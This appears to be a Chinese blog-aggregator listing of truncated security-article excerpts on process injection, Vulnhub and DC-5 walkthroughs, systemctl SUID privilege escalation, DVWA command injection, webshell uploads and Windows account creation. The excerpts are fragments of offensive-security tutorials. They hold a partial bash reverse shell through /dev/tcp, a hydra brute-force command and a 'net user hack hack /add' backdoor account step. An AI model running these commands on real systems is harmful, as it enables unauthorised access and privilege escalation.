首先我们来看下进程程注入的核心逻辑(不考虑寻找目标进程、不考虑注入内容的执行) /* 注入恶意Payload: OpenProcess 可以打开目标进程 VirtualAllocEx 在目标进程中分配一块内存区域 WriteProcessMemory 在刚刚分配的内存区域中写入恶意的Payload ...
分类:
其他好文 时间:
2021-07-26 16:55:06
阅读次数:
0
听说练习Vulnhub靶机,可以提升一些提权的小技巧,前来练习。 先使用nmap扫描一下,知道了靶机IP地址,以及开放的端口服务(ftp、ssh、http) 访问http服务看看有没有什么可以GetWebshell的点,但是有点空没啥可以利用的 于是使用dirsearch工具扫描后台目录,发现有一个 ...
分类:
其他好文 时间:
2021-06-05 18:03:23
阅读次数:
0
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:
其他好文 时间:
2021-05-24 14:55:34
阅读次数:
0
Low 命令注入Low级别的,我们先看一下源码 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping comma ...
分类:
其他好文 时间:
2021-05-03 12:31:22
阅读次数:
0
1.后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 -- 下面是近些年的一些例子: 编译器:苹果Xcode后门事件。苹果Xcode后门事件中招的APP包括 ...
分类:
其他好文 时间:
2021-03-30 13:03:51
阅读次数:
0
DC-5 存活探测 端口扫描 从80入手 conract提交后,发现日期有变化,并且参数变量可控,猜测文件包含 尝试包含/etc/passwd 从日志文件入手 尝试写入shell 失败了很多次,恢复快照后,ip变了 反弹shell 返回交互式 中途断了一次,换了端口 python反弹 提权(/bin ...
分类:
其他好文 时间:
2021-03-16 11:54:54
阅读次数:
0
漏扫工具:Goby,Nmap,Nessus namp --script=vuln 默认nse插件 nmap vulscan vulners调用第三方库探针 nessus安装-使用-插件库加载器 在提权过程中需要通过掌握的信息来对系统、软件等存在的漏洞进行搜索,获取其利用的poc,通过编译后,实施提权 ...
分类:
其他好文 时间:
2021-02-06 12:10:45
阅读次数:
0
一、文件上传漏洞介绍 Web应用程序中,提供用户上传各种文档、照片的文件等的接口。那么如果用户能够正常上传后端脚本文件(Webshell)并访问执行,就会造成文件上传漏洞。 二、Metasploit利用文件上传漏洞操作 三、Linux服务器提权案例演示 四、拿下DMZ服务器之后的思路 ...
分类:
Web程序 时间:
2021-02-02 11:30:29
阅读次数:
0
0x00 cewl http://192.168.43.179/websec/爬取页面所有的单词做成字典 hydra -l contact@hacknos.com -P cewl.txt 192.168.43.179 http-post-form "/websec/admin:username=^U ...
分类:
其他好文 时间:
2021-01-04 10:56:16
阅读次数:
0
使用命令给windows用户提权 创建与提权 功打开虚拟终端后,首先使用命令“ipconfig”,查看网站服务器的IP地址。 接下来,我们使用“whoami”命令查看当前用户。 然后使用“net user”命令,查看网站服务器上的用户账户。 使用命令“net user hack hack /add” ...